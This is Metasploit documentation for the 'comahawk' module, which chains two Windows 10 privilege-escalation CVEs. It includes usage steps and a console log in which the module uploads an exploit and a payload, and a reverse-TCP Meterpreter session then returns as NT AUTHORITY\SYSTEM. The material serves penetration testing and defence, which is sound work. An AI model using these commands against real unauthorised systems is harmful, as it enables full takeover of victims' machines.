adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
fc3b08fb8b97539d016878eb774df28362c444e3
metasploit-gs/documentation/modules/exploit/windows/local/comahawk.md
T
h00die c904b9d2f2 scenario to scenarios
2020-01-16 10:36:38 -05:00

111 lines
4.5 KiB
Markdown
Raw Blame History

## Introduction
This leverages two vulnerabilities on specific builds of Windows 10 to
move from an authenticated user of any level to NT AUTHORITY\LOCAL SERVICE
and then from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
NT AUTHORITY\LOCAL SERVICE
The second (CVE-2019-1322) leverages the Update Orchestrator Service to
elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
The exploit works by creating a new service, so the exploit may take
up to minute on test systems, and may take longer in the wild. Adjusting
the exploit_timeout value in the datastore.
## Usage
1. Create a session on the target system under the context of an authenticated user.
2. Begin interacting with the module: `use exploit/windows/local/comahawk`.
3. Set the `PAYLOAD` and configure it correctly.
4. If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled: `set DisablePayloadHandler true`.
5. Make sure that the `SESSION` value is set to the existing session identifier.
6. Invoke the module: `run`.
## Scenarios
### Windows 10 (10.0 Build 17134) x64
```
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49674) at 2019-12-11 18:33:09 -0600
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/comahawk
msf5 exploit(windows/local/comahawk) > set versbose true
versbose => true
msf5 exploit(windows/local/comahawk) > set session 1
session => 1
msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/comahawk) > show options
Module options (exploit/windows/local/comahawk):
Name Current Setting Required Description
---- --------------- -------- -----------
EXECUTE_DELAY 3 yes The number of seconds to delay between file upload and exploit launch
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
EXPLOIT_TIMEOUT 60 yes The number of seconds to wait for exploit to finish running
PAYLOAD_NAME no The filename for the payload to be used on the target host (%RAND%.exe by default).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Path to write binaries (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf5 exploit(windows/local/comahawk) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
[*] Exploit uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TcpHnwmv.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\EubQLoJJbPMX.exe
[*] It may take a moment after the session is established for the exploit to exit safely.
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-12-11 18:35:35 -0600
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink